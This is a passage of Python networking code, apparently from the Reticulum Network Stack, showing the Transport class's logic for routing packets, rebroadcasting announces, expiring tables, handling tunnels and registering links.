announce_context = RNS.Packet.NONE
if block_rebroadcasts:
announce_context = RNS.Packet.PATH_RESPONSE
announce_data = packet.data
announce_identity = RNS.Identity.recall(packet.destination_hash)
announce_destination = RNS.Destination(announce_identity, RNS.Destination.OUT, RNS.Destination.SINGLE, "unknown", "unknown");
announce_destination.hash = packet.destination_hash
announce_destination.hexhash = announce_destination.hash.hex()
new_packet = RNS.Packet(
announce_destination,
announce_data,
RNS.Packet.ANNOUNCE,
context = announce_context,
header_type = RNS.Packet.HEADER_2,
transport_type = Transport.TRANSPORT,
transport_id = Transport.identity.hash,
attached_interface = attached_interface
)
new_packet.hops = announce_entry[4]
if block_rebroadcasts:
RNS.log("Rebroadcasting announce as path response for "+RNS.prettyhexrep(announce_destination.hash)+" with hop count "+str(new_packet.hops), RNS.LOG_DEBUG)
else:
RNS.log("Rebroadcasting announce for "+RNS.prettyhexrep(announce_destination.hash)+" with hop count "+str(new_packet.hops), RNS.LOG_DEBUG)
outgoing.append(new_packet)
# This handles an edge case where a peer sends a past
# request for a destination just after an announce for
# said destination has arrived, but before it has been
# rebroadcast locally. In such a case the actual announce
# is temporarily held, and then reinserted when the path
# request has been served to the peer.
if destination_hash in Transport.held_announces:
held_entry = Transport.held_announces.pop(destination_hash)
Transport.announce_table[destination_hash] = held_entry
RNS.log("Reinserting held announce into table", RNS.LOG_DEBUG)
Transport.announces_last_checked = time.time()
# Cull the packet hashlist if it has reached max size
if len(Transport.packet_hashlist) > Transport.hashlist_maxsize:
Transport.packet_hashlist = Transport.packet_hashlist[len(Transport.packet_hashlist)-Transport.hashlist_maxsize:len(Transport.packet_hashlist)-1]
if time.time() > Transport.tables_last_culled + Transport.tables_cull_interval:
# Cull the reverse table according to timeout
stale_reverse_entries = []
for truncated_packet_hash in Transport.reverse_table:
reverse_entry = Transport.reverse_table[truncated_packet_hash]
if time.time() > reverse_entry[2] + Transport.REVERSE_TIMEOUT:
stale_reverse_entries.append(truncated_packet_hash)
# Cull the link table according to timeout
stale_links = []
for link_id in Transport.link_table:
link_entry = Transport.link_table[link_id]
if time.time() > link_entry[0] + Transport.LINK_TIMEOUT:
stale_links.append(link_id)
# Cull the path table
stale_paths = []
for destination_hash in Transport.destination_table:
destination_entry = Transport.destination_table[destination_hash]
attached_interface = destination_entry[5]
if time.time() > destination_entry[0] + Transport.DESTINATION_TIMEOUT:
stale_paths.append(destination_hash)
RNS.log("Path to "+RNS.prettyhexrep(destination_hash)+" timed out and was removed", RNS.LOG_DEBUG)
elif not attached_interface in Transport.interfaces:
stale_paths.append(destination_hash)
RNS.log("Path to "+RNS.prettyhexrep(destination_hash)+" was removed since the attached interface no longer exists", RNS.LOG_DEBUG)
# Cull the tunnel table
stale_tunnels = []
ti = 0
for tunnel_id in Transport.tunnels:
tunnel_entry = Transport.tunnels[tunnel_id]
expires = tunnel_entry[3]
if time.time() > expires:
stale_tunnels.append(tunnel_id)
RNS.log("Tunnel "+RNS.prettyhexrep(tunnel_id)+" timed out and was removed", RNS.LOG_DEBUG)
else:
stale_tunnel_paths = []
tunnel_paths = tunnel_entry[2]
for tunnel_path in tunnel_paths:
tunnel_path_entry = tunnel_paths[tunnel_path]
if time.time() > tunnel_path_entry[0] + Transport.DESTINATION_TIMEOUT:
stale_tunnel_paths.append(tunnel_path)
RNS.log("Tunnel path to "+RNS.prettyhexrep(tunnel_path)+" timed out and was removed", RNS.LOG_DEBUG)
for tunnel_path in stale_tunnel_paths:
tunnel_paths.pop(tunnel_path)
ti += 1
if ti > 0:
if ti == 1:
RNS.log("Removed "+str(ti)+" tunnel path", RNS.LOG_DEBUG)
else:
RNS.log("Removed "+str(ti)+" tunnel paths", RNS.LOG_DEBUG)
i = 0
for truncated_packet_hash in stale_reverse_entries:
Transport.reverse_table.pop(truncated_packet_hash)
i += 1
if i > 0:
if i == 1:
RNS.log("Dropped "+str(i)+" reverse table entry", RNS.LOG_DEBUG)
else:
RNS.log("Dropped "+str(i)+" reverse table entries", RNS.LOG_DEBUG)
i = 0
for link_id in stale_links:
Transport.link_table.pop(link_id)
i += 1
if i > 0:
if i == 1:
RNS.log("Dropped "+str(i)+" link", RNS.LOG_DEBUG)
else:
RNS.log("Dropped "+str(i)+" links", RNS.LOG_DEBUG)
i = 0
for destination_hash in stale_paths:
Transport.destination_table.pop(destination_hash)
i += 1
if i > 0:
if i == 1:
RNS.log("Removed "+str(i)+" path", RNS.LOG_DEBUG)
else:
RNS.log("Removed "+str(i)+" paths", RNS.LOG_DEBUG)
i = 0
for tunnel_id in stale_tunnels:
Transport.tunnels.pop(tunnel_id)
i += 1
if i > 0:
if i == 1:
RNS.log("Removed "+str(i)+" tunnel", RNS.LOG_DEBUG)
else:
RNS.log("Removed "+str(i)+" tunnels", RNS.LOG_DEBUG)
Transport.tables_last_culled = time.time()
except Exception as e:
RNS.log("An exception occurred while running Transport jobs.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
traceback.print_exc()
Transport.jobs_running = False
for packet in outgoing:
packet.send()
@staticmethod
def outbound(packet):
while (Transport.jobs_running):
sleep(0.01)
Transport.jobs_locked = True
# TODO: This updateHash call might be redundant
packet.update_hash()
sent = False
# Check if we have a known path for the destination in the path table
if packet.packet_type != RNS.Packet.ANNOUNCE and packet.destination_hash in Transport.destination_table:
outbound_interface = Transport.destination_table[packet.destination_hash][5]
# If there's more than one hop to the destination, and we know
# a path, we insert the packet into transport by adding the next
# transport nodes address to the header, and modifying the flags.
# This rule applies both for "normal" transport, and when connected
# to a local shared Reticulum instance.
if Transport.destination_table[packet.destination_hash][2] > 1:
if packet.header_type == RNS.Packet.HEADER_1:
# Insert packet into transport
new_flags = (RNS.Packet.HEADER_2) << 6 | (Transport.TRANSPORT) << 4 | (packet.flags & 0b00001111)
new_raw = struct.pack("!B", new_flags)
new_raw += packet.raw[1:2]
new_raw += Transport.destination_table[packet.destination_hash][1]
new_raw += packet.raw[2:]
outbound_interface.processOutgoing(new_raw)
Transport.destination_table[packet.destination_hash][0] = time.time()
sent = True
# In the special case where we are connected to a local shared
# Reticulum instance, and the destination is one hop away, we
# also add transport headers to inject the packet into transport
# via the shared instance. Normally a packet for a destination
# one hop away would just be broadcast directly, but since we
# are "behind" a shared instance, we need to get that instance
# to transport it onto the network.
elif Transport.destination_table[packet.destination_hash][2] == 1 and Transport.owner.is_connected_to_shared_instance:
if packet.header_type == RNS.Packet.HEADER_1:
# Insert packet into transport
new_flags = (RNS.Packet.HEADER_2) << 6 | (Transport.TRANSPORT) << 4 | (packet.flags & 0b00001111)
new_raw = struct.pack("!B", new_flags)
new_raw += packet.raw[1:2]
new_raw += Transport.destination_table[packet.destination_hash][1]
new_raw += packet.raw[2:]
outbound_interface.processOutgoing(new_raw)
Transport.destination_table[packet.destination_hash][0] = time.time()
sent = True
# If none of the above applies, we know the destination is
# directly reachable, and also on which interface, so we
# simply transmit the packet directly on that one.
else:
outbound_interface.processOutgoing(packet.raw)
sent = True
# If we don't have a known path for the destination, we'll
# broadcast the packet on all outgoing interfaces, or the
# just the relevant interface if the packet has an attached
# interface, or belongs to a link.
else:
stored_hash = False
for interface in Transport.interfaces:
if interface.OUT:
should_transmit = True
if packet.destination.type == RNS.Destination.LINK:
if packet.destination.status == RNS.Link.CLOSED:
should_transmit = False
if interface != packet.destination.attached_interface:
should_transmit = False
if packet.attached_interface != None and interface != packet.attached_interface:
should_transmit = False
if should_transmit:
if not stored_hash:
Transport.packet_hashlist.append(packet.packet_hash)
stored_hash = True
interface.processOutgoing(packet.raw)
sent = True
if sent:
packet.sent = True
packet.sent_at = time.time()
# Don't generate receipt if it has been explicitly disabled
if (packet.create_receipt == True and
# Only generate receipts for DATA packets
packet.packet_type == RNS.Packet.DATA and
# Don't generate receipts for PLAIN destinations
packet.destination.type != RNS.Destination.PLAIN and
# Don't generate receipts for link-related packets
not (packet.context >= RNS.Packet.KEEPALIVE and packet.context <= RNS.Packet.LRPROOF) and
# Don't generate receipts for resource packets
not (packet.context >= RNS.Packet.RESOURCE and packet.context <= RNS.Packet.RESOURCE_RCL)):
packet.receipt = RNS.PacketReceipt(packet)
Transport.receipts.append(packet.receipt)
Transport.cache(packet)
Transport.jobs_locked = False
return sent
@staticmethod
def packet_filter(packet):
# TODO: Think long and hard about this.
# Is it even strictly necessary with the current
# transport rules?
if packet.context == RNS.Packet.KEEPALIVE:
return True
if packet.context == RNS.Packet.RESOURCE_REQ:
return True
if packet.context == RNS.Packet.RESOURCE_PRF:
return True
if packet.context == RNS.Packet.RESOURCE:
return True
if packet.context == RNS.Packet.CACHE_REQUEST:
return True
if packet.destination_type == RNS.Destination.PLAIN:
return True
if not packet.packet_hash in Transport.packet_hashlist:
return True
else:
if packet.packet_type == RNS.Packet.ANNOUNCE:
return True
RNS.log("Filtered packet with hash "+RNS.prettyhexrep(packet.packet_hash), RNS.LOG_DEBUG)
return False
@staticmethod
def inbound(raw, interface=None):
while (Transport.jobs_running):
sleep(0.01)
Transport.jobs_locked = True
packet = RNS.Packet(None, raw)
packet.unpack()
packet.receiving_interface = interface
packet.hops += 1
if interface != None:
if hasattr(interface, "r_stat_rssi"):
if interface.r_stat_rssi != None:
packet.rssi = interface.r_stat_rssi
if len(Transport.local_client_interfaces) > 0:
Transport.local_client_rssi_cache.append([packet.packet_hash, packet.rssi])
while len(Transport.local_client_rssi_cache) > Transport.LOCAL_CLIENT_CACHE_MAXSIZE:
Transport.local_client_rssi_cache.pop()
if hasattr(interface, "r_stat_snr"):
if interface.r_stat_rssi != None:
packet.snr = interface.r_stat_snr
if len(Transport.local_client_interfaces) > 0:
Transport.local_client_snr_cache.append([packet.packet_hash, packet.snr])
while len(Transport.local_client_snr_cache) > Transport.LOCAL_CLIENT_CACHE_MAXSIZE:
Transport.local_client_snr_cache.pop()
if len(Transport.local_client_interfaces) > 0:
if Transport.is_local_client_interface(interface):
packet.hops -= 1
elif Transport.interface_to_shared_instance(interface):
packet.hops -= 1
if Transport.packet_filter(packet):
Transport.packet_hashlist.append(packet.packet_hash)
Transport.cache(packet)
# Check special conditions for local clients connected
# through a shared Reticulum instance
from_local_client = (packet.receiving_interface in Transport.local_client_interfaces)
for_local_client = (packet.packet_type != RNS.Packet.ANNOUNCE) and (packet.destination_hash in Transport.destination_table and Transport.destination_table[packet.destination_hash][2] == 0)
for_local_client_link = (packet.packet_type != RNS.Packet.ANNOUNCE) and (packet.destination_hash in Transport.link_table and Transport.link_table[packet.destination_hash][4] in Transport.local_client_interfaces)
for_local_client_link |= (packet.packet_type != RNS.Packet.ANNOUNCE) and (packet.destination_hash in Transport.link_table and Transport.link_table[packet.destination_hash][2] in Transport.local_client_interfaces)
proof_for_local_client = (packet.destination_hash in Transport.reverse_table) and (Transport.reverse_table[packet.destination_hash][0] in Transport.local_client_interfaces)
# Plain broadcast packets from local clients are sent
# directly on all attached interfaces, since they are
# never injected into transport.
if not packet.destination_hash in Transport.control_hashes:
if packet.destination_type == RNS.Destination.PLAIN and packet.transport_type == Transport.BROADCAST:
# Send to all interfaces except the originator
if from_local_client:
for interface in Transport.interfaces:
if interface != packet.receiving_interface:
interface.processOutgoing(packet.raw)
# If the packet was not from a local client, send
# it directly to all local clients
else:
for interface in Transport.local_client_interfaces:
interface.processOutgoing(packet.raw)
# General transport handling. Takes care of directing
# packets according to transport tables and recording
# entries in reverse and link tables.
if RNS.Reticulum.transport_enabled() or from_local_client or for_local_client or for_local_client_link:
# If there is no transport id, but the packet is
# for a local client, we generate the transport
# id (it was stripped on the previous hop, since
# we "spoof" the hop count for clients behind a
# shared instance, so they look directly reach-
# able), and reinsert, so the normal transport
# implementation can handle the packet.
if packet.transport_id == None and for_local_client:
packet.transport_id = Transport.identity.hash
# If this is a cache request, and we can fullfill
# it, do so and stop processing. Otherwise resume
# normal processing.
if packet.context == RNS.Packet.CACHE_REQUEST:
if Transport.cache_request_packet(packet):
return
# If the packet is in transport, check whether we
# are the designated next hop, and process it
# accordingly if we are.
if packet.transport_id != None and packet.packet_type != RNS.Packet.ANNOUNCE:
if packet.transport_id == Transport.identity.hash:
if packet.destination_hash in Transport.destination_table:
next_hop = Transport.destination_table[packet.destination_hash][1]
remaining_hops = Transport.destination_table[packet.destination_hash][2]
if remaining_hops > 1:
# Just increase hop count and transmit
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += next_hop
new_raw += packet.raw[12:]
elif remaining_hops == 1:
# Strip transport headers and transmit
new_flags = (RNS.Packet.HEADER_1) << 6 | (Transport.BROADCAST) << 4 | (packet.flags & 0b00001111)
new_raw = struct.pack("!B", new_flags)
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[12:]
elif remaining_hops == 0:
# Just increase hop count and transmit
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
outbound_interface = Transport.destination_table[packet.destination_hash][5]
outbound_interface.processOutgoing(new_raw)
Transport.destination_table[packet.destination_hash][0] = time.time()
if packet.packet_type == RNS.Packet.LINKREQUEST:
# Entry format is
link_entry = [ time.time(), # 0: Timestamp,
next_hop, # 1: Next-hop transport ID
outbound_interface, # 2: Next-hop interface
remaining_hops, # 3: Remaining hops
packet.receiving_interface, # 4: Received on interface
packet.hops, # 5: Taken hops
packet.destination_hash, # 6: Original destination hash
False] # 7: Validated
Transport.link_table[packet.getTruncatedHash()] = link_entry
else:
# Entry format is
reverse_entry = [ packet.receiving_interface, # 0: Received on interface
outbound_interface, # 1: Outbound interface
time.time()] # 2: Timestamp
Transport.reverse_table[packet.getTruncatedHash()] = reverse_entry
else:
# TODO: There should probably be some kind of REJECT
# mechanism here, to signal to the source that their
# expected path failed.
RNS.log("Got packet in transport, but no known path to final destination "+RNS.prettyhexrep(packet.destination_hash)+". Dropping packet.", RNS.LOG_DEBUG)
# Link transport handling. Directs packets according
# to entries in the link tables
if packet.packet_type != RNS.Packet.ANNOUNCE and packet.packet_type != RNS.Packet.LINKREQUEST and packet.context != RNS.Packet.LRPROOF:
if packet.destination_hash in Transport.link_table:
link_entry = Transport.link_table[packet.destination_hash]
# If receiving and outbound interface is
# the same for this link, direction doesn't
# matter, and we simply send the packet on.
outbound_interface = None
if link_entry[2] == link_entry[4]:
# But check that taken hops matches one
# of the expectede values.
if packet.hops == link_entry[3] or packet.hops == link_entry[5]:
outbound_interface = link_entry[2]
else:
# If interfaces differ, we transmit on
# the opposite interface of what the
# packet was received on.
if packet.receiving_interface == link_entry[2]:
# Also check that expected hop count matches
if packet.hops == link_entry[3]:
outbound_interface = link_entry[4]
elif packet.receiving_interface == link_entry[4]:
# Also check that expected hop count matches
if packet.hops == link_entry[5]:
outbound_interface = link_entry[2]
if outbound_interface != None:
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
outbound_interface.processOutgoing(new_raw)
Transport.link_table[packet.destination_hash][0] = time.time()
else:
pass
# Announce handling. Handles logic related to incoming
# announces, queueing rebroadcasts of these, and removal
# of queued announce rebroadcasts once handed to the next node.
if packet.packet_type == RNS.Packet.ANNOUNCE:
local_destination = next((d for d in Transport.destinations if d.hash == packet.destination_hash), None)
if local_destination == None and RNS.Identity.validate_announce(packet):
if packet.transport_id != None:
received_from = packet.transport_id
# Check if this is a next retransmission from
# another node. If it is, we're removing the
# announce in question from our pending table
if RNS.Reticulum.transport_enabled() and packet.destination_hash in Transport.announce_table:
announce_entry = Transport.announce_table[packet.destination_hash]
if packet.hops-1 == announce_entry[4]:
RNS.log("Heard a local rebroadcast of announce for "+RNS.prettyhexrep(packet.destination_hash), RNS.LOG_DEBUG)
announce_entry[6] += 1
if announce_entry[6] >= Transport.LOCAL_REBROADCASTS_MAX:
RNS.log("Max local rebroadcasts of announce for "+RNS.prettyhexrep(packet.destination_hash)+" reached, dropping announce from our table", RNS.LOG_DEBUG)
Transport.announce_table.pop(packet.destination_hash)
if packet.hops-1 == announce_entry[4]+1 and announce_entry[2] > 0:
now = time.time()
if now < announce_entry[1]:
RNS.log("Rebroadcasted announce for "+RNS.prettyhexrep(packet.destination_hash)+" has been passed on to next node, no further tries needed", RNS.LOG_DEBUG)
Transport.announce_table.pop(packet.destination_hash)
else:
received_from = packet.destination_hash
# Check if this announce should be inserted into
# announce and destination tables
should_add = False
# First, check that the announce is not for a destination
# local to this system, and that hops are less than the max
if (not any(packet.destination_hash == d.hash for d in Transport.destinations) and packet.hops < Transport.PATHFINDER_M+1):
random_blob = packet.data[RNS.Identity.KEYSIZE//8:RNS.Identity.KEYSIZE//8+RNS.Reticulum.TRUNCATED_HASHLENGTH//8]
announce_emitted = int.from_bytes(random_blob[5:10], "big")
random_blobs = []
if packet.destination_hash in Transport.destination_table:
random_blobs = Transport.destination_table[packet.destination_hash][4]
# If we already have a path to the announced
# destination, but the hop count is equal or
# less, we'll update our tables.
if packet.hops <= Transport.destination_table[packet.destination_hash][2]:
# Make sure we haven't heard the random
# blob before, so announces can't be
# replayed to forge paths.
# TODO: Check whether this approach works
# under all circumstances
if not random_blob in random_blobs:
should_add = True
else:
should_add = False
else:
# If an announce arrives with a larger hop
# count than we already have in the table,
# ignore it, unless the path is expired, or
# the emission timestamp is more recent.
now = time.time()
path_expires = Transport.destination_table[packet.destination_hash][3]
path_announce_emitted = 0
for path_random_blob in random_blobs:
path_announce_emitted = max(path_announce_emitted, int.from_bytes(path_random_blob[5:10], "big"))
if path_announce_emitted >= announce_emitted:
break
if (now >= path_expires):
# We also check that the announce hash is
# different from ones we've already heard,
# to avoid loops in the network
if not random_blob in random_blobs:
# TODO: Check that this ^ approach actually
# works under all circumstances
RNS.log("Replacing destination table entry for "+str(RNS.prettyhexrep(packet.destination_hash))+" with new announce due to expired path", RNS.LOG_DEBUG)
should_add = True
else:
should_add = False
else:
if (announce_emitted > path_announce_emitted):
if not random_blob in random_blobs:
RNS.log("Replacing destination table entry for "+str(RNS.prettyhexrep(packet.destination_hash))+" with new announce, since it was more recently emitted", RNS.LOG_DEBUG)
should_add = True
else:
should_add = False
else:
# If this destination is unknown in our table
# we should add it
should_add = True
if should_add:
now = time.time()
retries = 0
expires = now + Transport.PATHFINDER_E
announce_hops = packet.hops
local_rebroadcasts = 0
block_rebroadcasts = False
attached_interface = None
retransmit_timeout = now + math.pow(Transport.PATHFINDER_C, packet.hops) + (RNS.rand() * Transport.PATHFINDER_RW)
random_blobs.append(random_blob)
if (RNS.Reticulum.transport_enabled() or Transport.from_local_client(packet)) and packet.context != RNS.Packet.PATH_RESPONSE:
# If the announce is from a local client,
# we announce it immediately, but only one
# time.
if Transport.from_local_client(packet):
retransmit_timeout = now
retries = Transport.PATHFINDER_R
Transport.announce_table[packet.destination_hash] = [
now,
retransmit_timeout,
retries,
received_from,
announce_hops,
packet,
local_rebroadcasts,
block_rebroadcasts,
attached_interface
]
# If we have any local clients connected, we re-
# transmit the announce to them immediately
if (len(Transport.local_client_interfaces)):
announce_identity = RNS.Identity.recall(packet.destination_hash)
announce_destination = RNS.Destination(announce_identity, RNS.Destination.OUT, RNS.Destination.SINGLE, "unknown", "unknown");
announce_destination.hash = packet.destination_hash
announce_destination.hexhash = announce_destination.hash.hex()
announce_context = RNS.Packet.NONE
announce_data = packet.data
if Transport.from_local_client(packet) and packet.context == RNS.Packet.PATH_RESPONSE:
for local_interface in Transport.local_client_interfaces:
if packet.receiving_interface != local_interface:
new_announce = RNS.Packet(
announce_destination,
announce_data,
RNS.Packet.ANNOUNCE,
context = announce_context,
header_type = RNS.Packet.HEADER_2,
transport_type = Transport.TRANSPORT,
transport_id = Transport.identity.hash,
attached_interface = local_interface
)
new_announce.hops = packet.hops
new_announce.send()
else:
for local_interface in Transport.local_client_interfaces:
if packet.receiving_interface != local_interface:
new_announce = RNS.Packet(
announce_destination,
announce_data,
RNS.Packet.ANNOUNCE,
context = announce_context,
header_type = RNS.Packet.HEADER_2,
transport_type = Transport.TRANSPORT,
transport_id = Transport.identity.hash,
attached_interface = local_interface
)
new_announce.hops = packet.hops
new_announce.send()
destination_table_entry = [now, received_from, announce_hops, expires, random_blobs, packet.receiving_interface, packet]
Transport.destination_table[packet.destination_hash] = destination_table_entry
RNS.log("Path to "+RNS.prettyhexrep(packet.destination_hash)+" is now "+str(announce_hops)+" hops away via "+RNS.prettyhexrep(received_from)+" on "+str(packet.receiving_interface), RNS.LOG_VERBOSE)
# If the receiving interface is a tunnel, we add the
# announce to the tunnels table
if hasattr(packet.receiving_interface, "tunnel_id") and packet.receiving_interface.tunnel_id != None:
tunnel_entry = Transport.tunnels[packet.receiving_interface.tunnel_id]
paths = tunnel_entry[2]
paths[packet.destination_hash] = destination_table_entry
expires = time.time() + Transport.DESTINATION_TIMEOUT
tunnel_entry[3] = expires
RNS.log("Path to "+RNS.prettyhexrep(packet.destination_hash)+" associated with tunnel "+RNS.prettyhexrep(packet.receiving_interface.tunnel_id), RNS.LOG_VERBOSE)
# Call externally registered callbacks from apps
# wanting to know when an announce arrives
if packet.context != RNS.Packet.PATH_RESPONSE:
for handler in Transport.announce_handlers:
try:
# Check that the announced destination matches
# the handlers aspect filter
execute_callback = False
if handler.aspect_filter == None:
# If the handlers aspect filter is set to
# None, we execute the callback in all cases
execute_callback = True
else:
announce_identity = RNS.Identity.recall(packet.destination_hash)
handler_expected_hash = RNS.Destination.hash_from_name_and_identity(handler.aspect_filter, announce_identity)
if packet.destination_hash == handler_expected_hash:
execute_callback = True
if execute_callback:
handler.received_announce(
destination_hash=packet.destination_hash,
announced_identity=announce_identity,
app_data=RNS.Identity.recall_app_data(packet.destination_hash)
)
except Exception as e:
RNS.log("Error while processing external announce callback.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
# Handling for linkrequests to local destinations
elif packet.packet_type == RNS.Packet.LINKREQUEST:
for destination in Transport.destinations:
if destination.hash == packet.destination_hash and destination.type == packet.destination_type:
packet.destination = destination
destination.receive(packet)
# Handling for local data packets
elif packet.packet_type == RNS.Packet.DATA:
if packet.destination_type == RNS.Destination.LINK:
for link in Transport.active_links:
if link.link_id == packet.destination_hash:
packet.link = link
link.receive(packet)
else:
for destination in Transport.destinations:
if destination.hash == packet.destination_hash and destination.type == packet.destination_type:
packet.destination = destination
destination.receive(packet)
if destination.proof_strategy == RNS.Destination.PROVE_ALL:
packet.prove()
elif destination.proof_strategy == RNS.Destination.PROVE_APP:
if destination.callbacks.proof_requested:
try:
if destination.callbacks.proof_requested(packet):
packet.prove()
except Exception as e:
RNS.log("Error while executing proof request callback. The contained exception was: "+str(e), RNS.LOG_ERROR)
# Handling for proofs and link-request proofs
elif packet.packet_type == RNS.Packet.PROOF:
if packet.context == RNS.Packet.LRPROOF:
# This is a link request proof, check if it
# needs to be transported
if (RNS.Reticulum.transport_enabled() or for_local_client_link or from_local_client) and packet.destination_hash in Transport.link_table:
link_entry = Transport.link_table[packet.destination_hash]
if packet.receiving_interface == link_entry[2]:
# TODO: Should we validate the LR proof at each transport
# step before transporting it?
RNS.log("Link request proof received on correct interface, transporting it via "+str(link_entry[4]), RNS.LOG_DEBUG)
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
Transport.link_table[packet.destination_hash][7] = True
link_entry[4].processOutgoing(new_raw)
else:
RNS.log("Link request proof received on wrong interface, not transporting it.", RNS.LOG_DEBUG)
else:
# Check if we can deliver it to a local
# pending link
for link in Transport.pending_links:
if link.link_id == packet.destination_hash:
link.validate_proof(packet)
elif packet.context == RNS.Packet.RESOURCE_PRF:
for link in Transport.active_links:
if link.link_id == packet.destination_hash:
link.receive(packet)
else:
if packet.destination_type == RNS.Destination.LINK:
for link in Transport.active_links:
if link.link_id == packet.destination_hash:
packet.link = link
if len(packet.data) == RNS.PacketReceipt.EXPL_LENGTH:
proof_hash = packet.data[:RNS.Identity.HASHLENGTH//8]
else:
proof_hash = None
# Check if this proof neds to be transported
if (RNS.Reticulum.transport_enabled() or from_local_client or proof_for_local_client) and packet.destination_hash in Transport.reverse_table:
reverse_entry = Transport.reverse_table.pop(packet.destination_hash)
if packet.receiving_interface == reverse_entry[1]:
RNS.log("Proof received on correct interface, transporting it via "+str(reverse_entry[0]), RNS.LOG_DEBUG)
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
reverse_entry[0].processOutgoing(new_raw)
else:
RNS.log("Proof received on wrong interface, not transporting it.", RNS.LOG_DEBUG)
for receipt in Transport.receipts:
receipt_validated = False
if proof_hash != None:
# Only test validation if hash matches
if receipt.hash == proof_hash:
receipt_validated = receipt.validate_proof_packet(packet)
else:
# TODO: This looks like it should actually
# be rewritten when implicit proofs are added.
# In case of an implicit proof, we have
# to check every single outstanding receipt
receipt_validated = receipt.validate_proof_packet(packet)
if receipt_validated:
if receipt in Transport.receipts:
Transport.receipts.remove(receipt)
Transport.jobs_locked = False
@staticmethod
def synthesize_tunnel(interface):
interface_hash = interface.get_hash()
public_key = RNS.Transport.identity.get_public_key()
random_hash = RNS.Identity.get_random_hash()
tunnel_id_data = public_key+interface_hash
tunnel_id = RNS.Identity.full_hash(tunnel_id_data)
signed_data = tunnel_id_data+random_hash
signature = Transport.identity.sign(signed_data)
data = signed_data+signature
tnl_snth_dst = RNS.Destination(None, RNS.Destination.OUT, RNS.Destination.PLAIN, Transport.APP_NAME, "tunnel", "synthesize")
packet = RNS.Packet(tnl_snth_dst, data, packet_type = RNS.Packet.DATA, transport_type = RNS.Transport.BROADCAST, header_type = RNS.Packet.HEADER_1, attached_interface = interface)
packet.send()
interface.wants_tunnel = False
@staticmethod
def tunnel_synthesize_handler(data, packet):
try:
expected_length = RNS.Identity.KEYSIZE//8+RNS.Identity.HASHLENGTH//8+RNS.Reticulum.TRUNCATED_HASHLENGTH//8+RNS.Identity.SIGLENGTH//8
if len(data) == expected_length:
public_key = data[:RNS.Identity.KEYSIZE//8]
interface_hash = data[RNS.Identity.KEYSIZE//8:RNS.Identity.KEYSIZE//8+RNS.Identity.HASHLENGTH//8]
tunnel_id_data = public_key+interface_hash
tunnel_id = RNS.Identity.full_hash(tunnel_id_data)
random_hash = data[RNS.Identity.KEYSIZE//8+RNS.Identity.HASHLENGTH//8:RNS.Identity.KEYSIZE//8+RNS.Identity.HASHLENGTH//8+RNS.Reticulum.TRUNCATED_HASHLENGTH//8]
signature = data[RNS.Identity.KEYSIZE//8+RNS.Identity.HASHLENGTH//8+RNS.Reticulum.TRUNCATED_HASHLENGTH//8:expected_length]
signed_data = tunnel_id_data+random_hash
remote_transport_identity = RNS.Identity(create_keys=False)
remote_transport_identity.load_public_key(public_key)
if remote_transport_identity.validate(signature, signed_data):
Transport.handle_tunnel(tunnel_id, packet.receiving_interface)
except Exception as e:
RNS.log("An error occurred while validating tunnel establishment packet.", RNS.LOG_DEBUG)
RNS.log("The contained exception was: "+str(e), RNS.LOG_DEBUG)
@staticmethod
def handle_tunnel(tunnel_id, interface):
expires = time.time() + Transport.DESTINATION_TIMEOUT
if not tunnel_id in Transport.tunnels:
RNS.log("Tunnel endpoint "+RNS.prettyhexrep(tunnel_id)+" established.", RNS.LOG_DEBUG)
paths = {}
tunnel_entry = [tunnel_id, interface, paths, expires]
interface.tunnel_id = tunnel_id
Transport.tunnels[tunnel_id] = tunnel_entry
else:
RNS.log("Tunnel endpoint "+RNS.prettyhexrep(tunnel_id)+" reappeared. Restoring paths...", RNS.LOG_DEBUG)
tunnel_entry = Transport.tunnels[tunnel_id]
tunnel_entry[1] = interface
tunnel_entry[3] = expires
interface.tunnel_id = tunnel_id
paths = tunnel_entry[2]
deprecated_paths = []
for destination_hash, path_entry in paths.items():
received_from = path_entry[1]
announce_hops = path_entry[2]
expires = path_entry[3]
random_blobs = path_entry[4]
receiving_interface = interface
packet = path_entry[6]
new_entry = [time.time(), received_from, announce_hops, expires, random_blobs, receiving_interface, packet]
should_add = False
if destination_hash in Transport.destination_table:
old_entry = Transport.destination_table[destination_hash]
old_hops = old_entry[2]
old_expires = old_entry[3]
if announce_hops <= old_hops or time.time() > old_expires:
should_add = True
else:
RNS.log("Did not restore path to "+RNS.prettyhexrep(packet.destination_hash)+" because a newer path with fewer hops exist", RNS.LOG_DEBUG)
else:
if time.time() < expires:
should_add = True
else:
RNS.log("Did not restore path to "+RNS.prettyhexrep(packet.destination_hash)+" because it has expired", RNS.LOG_DEBUG)
if should_add:
Transport.destination_table[destination_hash] = new_entry
RNS.log("Restored path to "+RNS.prettyhexrep(packet.destination_hash)+" is now "+str(announce_hops)+" hops away via "+RNS.prettyhexrep(received_from)+" on "+str(receiving_interface), RNS.LOG_DEBUG)
else:
deprecated_paths.append(destination_hash)
for deprecated_path in deprecated_paths:
RNS.log("Removing path to "+RNS.prettyhexrep(deprecated_path)+" from tunnel "+RNS.prettyhexrep(tunnel_id), RNS.LOG_DEBUG)
paths.pop(deprecated_path)
@staticmethod
def register_destination(destination):
destination.MTU = RNS.Reticulum.MTU
if destination.direction == RNS.Destination.IN:
for registered_destination in Transport.destinations:
if destination.hash == registered_destination.hash:
raise KeyError("Attempt to register an already registered destination.")
Transport.destinations.append(destination)
if Transport.owner.is_connected_to_shared_instance:
if destination.type == RNS.Destination.SINGLE:
destination.announce(path_response=True)
@staticmethod
def deregister_destination(destination):
if destination in Transport.destinations:
Transport.destinations.remove(destination)
@staticmethod
def register_link(link):
RNS.log("Registering link "+str(link), RNS.LOG_DEBUG)
if link.initiator:
Transport.pending_links.append(link)
else:
Transport.active_links.append(link)
@staticmethod
def activate_link(link):
RNS.log("Activating link "+str(link), RNS.LOG_DEBUG)
if link in Transport.pending_links:
Transport.pending_links.remove(link)
Transport.active_links.append(link)
